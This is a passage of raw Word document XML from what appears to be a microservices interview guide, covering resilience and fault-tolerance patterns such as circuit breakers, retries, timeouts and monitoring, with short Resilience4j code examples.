    <w:p w14:paraId="6A2F45A3" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F8071" w14:textId="77777777" w:rsidR="00A53A4A" w:rsidRPr="00FA65E9" w:rsidRDefault="00A53A4A" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To effectively handle load in microservices, a combination of strategies is often necessary, including horizontal scaling, caching, load balancing, asynchronous communication, and fault tolerance mechanisms. By carefully implementing these techniques and leveraging cloud-native tools, you can ensure that your microservices remain performant, scalable, and resilient under varying loads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE60FBD" w14:textId="5D326A12" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00115965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="772EE5CA">
          <v:rect id="_x0000_i2907" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8F616" w14:textId="62959BC8" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="694" w:name="_Toc196308174"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you handle resilience and fault tolerance in microservice</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="694"/>
    </w:p>
    <w:p w14:paraId="22DD55F6" w14:textId="0ED4B325" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resilience</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in microservices, we use design patterns, tools, and libraries that help services degrade gracefully during failures, avoid cascading issues, and recover automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203776A4" w14:textId="77777777" w:rsidR="00F25965"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32D7D99D">
          <v:rect id="_x0000_i2908" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF34DE" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Techniques for Resilience and Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2BE078" w14:textId="77777777" w:rsidR="00F25965"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1DC42026">
          <v:rect id="_x0000_i2909" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F41CD" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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1. Circuit Breaker Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9BFFA8"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevent repeated calls to a failing service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AABB3FC"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Tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Resilience4j, Hystrix (deprecated).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824B039"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How it works</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62896734" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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If failures exceed a threshold, the circuit "opens" and requests fail fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C491054" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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After a timeout, it allows limited traffic to test recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A044993"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CircuitBreaker(name = "myService", fallbackMethod = "fallbackMethod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018744D4"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public String callService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6823E0"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 xml:space="preserve">    return restTemplate.getForObject("http://example-service/data", String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F351E51"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D8FBD8" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06424EF6"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public String fallbackMethod(Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DBDD67"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 xml:space="preserve">    return "Service temporarily unavailable";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C98E6F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A2640" w14:textId="77777777" w:rsidR="00F25965"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0812098E">
          <v:rect id="_x0000_i2910" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="034A0446" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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2. Retry Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4992AC8D"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retry failed calls a specified number of times before failing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF26843"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Tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Resilience4j, Spring Retry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6096A50F"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Retry(name = "myService", fallbackMethod = "fallbackMethod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E471EAC"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public String callServiceWithRetry() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59706760"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 xml:space="preserve">    // retryable logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483AC53C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AD7633" w14:textId="77777777" w:rsidR="00F25965"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37054575">
          <v:rect id="_x0000_i2911" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C4F7B" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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3. Rate Limiter / Bulkhead Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A1EA10"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Rate Limiter</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Limits requests per time window to prevent overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D537C"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Bulkhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Isolates failures so one part doesn't affect others (like compartments in a ship).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319896A3"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Tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Resilience4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D7B5D8"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RateLimiter(name = "myService")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F67F602"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Bulkhead(name = "myService", type = Bulkhead.Type.THREADPOOL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5255A310" w14:textId="77777777" w:rsidR="00F25965"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60466E2C">
          <v:rect id="_x0000_i2912" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D6BDD" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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4. Timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFFC8F7"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fail fast when dependent service is taking too long.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD70BD"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How</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Configure HTTP client (e.g., RestTemplate, WebClient) with timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436AE7AA"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RestTemplateBuilder builder = new RestTemplateBuilder()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774638E6"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 xml:space="preserve">    .setConnectTimeout(Duration.ofSeconds(2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C01CF15"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .setReadTimeout(Duration.ofSeconds(3));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C723876" w14:textId="77777777" w:rsidR="00F25965"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08FD7191">
          <v:rect id="_x0000_i2913" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ECECEB" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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5. Fallback Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2049DC59"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provide default response or alternative logic when failure occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C97082A" w14:textId="77777777" w:rsidR="00F25965"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7DFA8A82">
          <v:rect id="_x0000_i2914" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5921182F" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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6. Service Discovery with Health Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9B69D"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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka</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Consul</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for service discovery and automatic removal of unhealthy services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF8252" w14:textId="77777777" w:rsidR="00F25965"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0FA09E55">
          <v:rect id="_x0000_i2915" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C76319" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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7. Asynchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3191B9"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 xml:space="preserve">Use message brokers like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for decoupling services to avoid failure propagation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B01F4D" w14:textId="77777777" w:rsidR="00F25965"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1FE6D528">
          <v:rect id="_x0000_i2916" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CADB68D" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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8. Graceful Degradation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F40F013"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Show limited functionality or cached responses when a service fails instead of full outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946F33B" w14:textId="77777777" w:rsidR="00F25965"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758C34CC">
          <v:rect id="_x0000_i2917" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDC83F" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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9. Monitoring &amp; Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27DA01"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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus + Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELK Stack</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Datadog</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to monitor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E305ED" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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Error rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716709FF" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F75E9F" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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Retry/circuit breaker states</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F5AB4A" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alert on anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB91232" w14:textId="77777777" w:rsidR="00F25965"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1ED26B13">
          <v:rect id="_x0000_i2918" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FBD99D" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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10. Service Mesh (Istio, Linkerd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD82086"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Built-in support for retries, timeouts, circuit breaking, load balancing, etc., outside of app code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376468E8" w14:textId="77777777" w:rsidR="00F25965"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09628036">
          <v:rect id="_x0000_i2919" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="221956E9" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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5"/>
        <w:gridCol w:w="1767"/>
        <w:gridCol w:w="3341"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="28FC5F1A" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4127FF30" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3675A669" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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Tool/Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A7DD90B" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="3E50ACB4" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74D935B2"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Circuit Breaker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BEDD1EB"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Resilience4j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D9AFFB5"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Prevent cascade failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="25D2CF88" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37FE493C"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Retry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="314C6674"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Resilience4j/Spring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B0339F2"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Automatic retry on transient failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="07D9D867" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
